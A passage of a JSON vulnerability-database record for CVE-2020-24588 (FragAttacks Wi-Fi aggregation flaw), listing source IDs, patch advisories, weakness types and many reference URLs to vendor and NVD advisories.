      {
        "db": "CS-HELP",
        "id": "SB2022031521",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051227",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021100407",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051118",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "164875",
        "trust": 0.6
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-104-04",
        "trust": 0.6
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-21-236-01",
        "trust": 0.6
      },
      {
        "db": "LENOVO",
        "id": "LEN-57316",
        "trust": 0.6
      },
      {
        "db": "LENOVO",
        "id": "LEN-61212",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-633",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-24588",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163251",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163301",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165296",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164837",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164967",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-24588"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006877"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-633"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-24588"
      }
    ]
  },
  "id": "VAR-202105-1431",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.37675563
  },
  "last_update_date": "2024-07-23T21:28:26.944000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "top page NEC NEC Product security information",
        "trust": 0.8,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html"
      },
      {
        "title": "Microsoft Windows Wireless Networking Fixes for access control error vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=151563"
      },
      {
        "title": "Red Hat: CVE-2020-24588",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2020-24588"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2020-24588 log"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.4-2022-004",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.4-2022-004"
      },
      {
        "title": "Cisco: Multiple Vulnerabilities in Frame Aggregation and Fragmentation Implementations of 802.11 Specification Affecting Cisco Products: May 2021",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-wifi-faf-22epcewu"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.10-2022-002",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.10-2022-002"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2020-24588 "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/kali973/fragattacks "
      },
      {
        "title": "fragattacks",
        "trust": 0.1,
        "url": "https://github.com/vanhoefm/fragattacks "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-24588"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006877"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-633"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-327",
        "trust": 1.0
      },
      {
        "problemtype": "Lack of authentication for critical features (CWE-306) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006877"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-24588"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.3,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-wifi-faf-22epcewu"
      },
      {
        "trust": 1.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24588"
      },
      {
        "trust": 1.7,
        "url": "https://www.fragattacks.com"
      },
      {
        "trust": 1.7,
        "url": "https://github.com/vanhoefm/fragattacks/blob/master/summary.md"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2021/05/11/12"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00020.html"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-913875.pdf"
      },
      {
        "trust": 1.7,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00473.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/12602-security-advisory-63"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00002.html"
      },
      {
        "trust": 1.0,
        "url": "https://access.redhat.com/security/cve/cve-2020-24588"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnvu93485736/"
      },
      {
        "trust": 0.6,
        "url": "https://www.qualcomm.com/company/product-security/bulletins/august-2021-bulletin"
      },
      {
        "trust": 0.6,
        "url": "https://support.lenovo.com/us/en/product_security/len-61212"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051227"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051920"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2216"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2876"
      },
      {
        "trust": 0.6,
        "url": "https://source.android.com/security/bulletin/2021-10-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3905"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.0995"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1628"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3825"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-104-04"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-102-04"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2368"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021100407"
      },
      {
        "trust": 0.6,
        "url": "https://msrc.microsoft.com/update-guide/vulnerability/cve-2020-24588"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-236-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.0845"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051715"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051814"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/wi-fi-devices-multiple-vulnerabilities-via-fragattacks-35386"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2509"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051118"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163291/ubuntu-security-notice-usn-5000-2.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/164875/red-hat-security-advisory-2021-4140-02.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2249"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2409"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022041319"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163249/ubuntu-security-notice-usn-4997-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1587"
      },
      {
        "trust": 0.6,
        "url": "https://support.lenovo.com/us/en/product_security/len-57316"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2136"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.4254"
      },
      {
        "trust": 0.6,
        "url": "https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202111-0000001218088197"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2079"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2290"
      },
      {
        "trust": 0.6,
        "url": "https://www.huawei.com/cn/psirt/security-notices/huawei-sn-20210513-01-fragattacks-cn"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1715"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031521"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26147"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24586"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26145"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23133"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24587"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26141"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26139"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33200"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3609"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31829"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31440"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23134"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3506"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32399"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-24504"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-27777"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-20239"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-36158"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3635"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-36386"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0427"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-24586"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3348"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26140"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26146"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-31440"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3732"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-0129"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-24502"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3564"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-0427"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-23133"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26144"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3679"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-29368"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-29646"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-29155"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3489"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-29660"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26139"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-28971"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26143"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3600"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26145"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-33200"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-29650"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-20194"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26147"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-31916"
      },
      {
        "trust": 0.3,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24503"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24502"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-31829"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3573"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26141"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-28950"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-24587"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-24503"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3659"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3543"
      },
      {
        "trust": 0.2,
        "url": "https://ubuntu.com/security/notices/usn-4997-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3200"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35448"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25013"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20284"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35522"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35524"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-27645"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33574"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3487"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13435"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-5827"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-24370"
      },
      {
        "trust": 0.2,
        "url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14145"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13751"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25014"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19603"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35521"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-35942"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17594"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36312"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3572"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12762"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36086"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3778"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22898"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-16135"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36084"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-17541"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3800"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36087"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36331"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31535"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23841"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14615"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3445"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22925"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-20673"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23840"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36330"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33033"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20232"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20266"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-20838"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22876"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20231"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36332"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14155"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-10001"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36085"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14615"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33560"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17595"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3481"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-42574"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25009"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25010"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35523"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-28153"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13750"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20197"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3426"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-18218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3580"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3796"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/327.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2020-24588"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-102-04"
      },
      {
        "trust": 0.1,
        "url": "https://alas.aws.amazon.com/al2/alaskernel-5.4-2022-004.html"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.8/5.8.0-1033.34~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.8/5.8.0-1036.38~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25670"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1029.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1035.37"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-59.66"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25671"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29155"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1038.40"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1036.38"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25673"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-59.66~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1030.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.8/5.8.0-1035.37~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.8/5.8.0-1038.40~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4999-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1033.34"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5000-2"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5000-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1041.42"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4997-2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.11.0-1010.10"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.11.0-1011.11"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.11.0-1012.13"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.11.0-1011.12"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.11.0-1009.9"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.11.0-22.23"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43527"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44228"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3712"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:5137"
      },
      {
        "trust": 0.1,
